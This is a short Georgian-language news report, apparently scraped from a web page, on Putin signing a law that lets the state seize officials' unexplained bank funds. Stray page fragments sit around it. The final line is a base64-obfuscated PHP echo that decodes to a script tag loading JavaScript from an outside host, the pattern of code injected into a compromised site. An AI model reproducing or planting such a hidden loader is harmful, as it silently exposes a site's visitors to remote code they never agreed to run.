celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა ხელი მოაწერა კანონს, რომელიც ანტიკორუფციული კანონმდებლობის გამკაცრებას ითვალისწინებს. ამის შესახებ რუსეთის სახელმწიფო მედია იუწყება.
 
კანონის თანახმად, სახელმწიფოს შემოსავლებში მოექცევა ჩინოსნების ანგარიშებზე არსებული თანხები, თუკი ის მათი სამი წლის შემოსავალს აღემატება.
 
დოკუმენტი სამართლებრივი ინფორმაციის ოფიციალურ პორტალზე გამოქვეყნდა.
 
"სავარაუდოა, რომ თანხას ამოიღებენ სახელმწიფოს სასარგებლოდ, თუკი არ იქნება წარმოდგენილი დამაჯერებელი ცნობები, ამ თანხების კანონიერების შესახებ. კანონი ასევე ითვალისწინებს რუსეთის გენერალური პროკურორის მიერ ფულადი სახსრების მიღების კანონიერების შესახებ, საბანკო ანგარიშებზე ან საკრედიტო ორგანიზაციებში მაღალჩინოსნებისგან წარმოდგენილი ცნობების შემოწმების წესს. ეს შეეხება არა მხოლოდ თანამდებობის პირებს, არამედ მათ მეუღლეებსა და არასრულწლოვან ბავშვებს", აღნიშნულია ინფორმაციაში.
 
 
1239
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");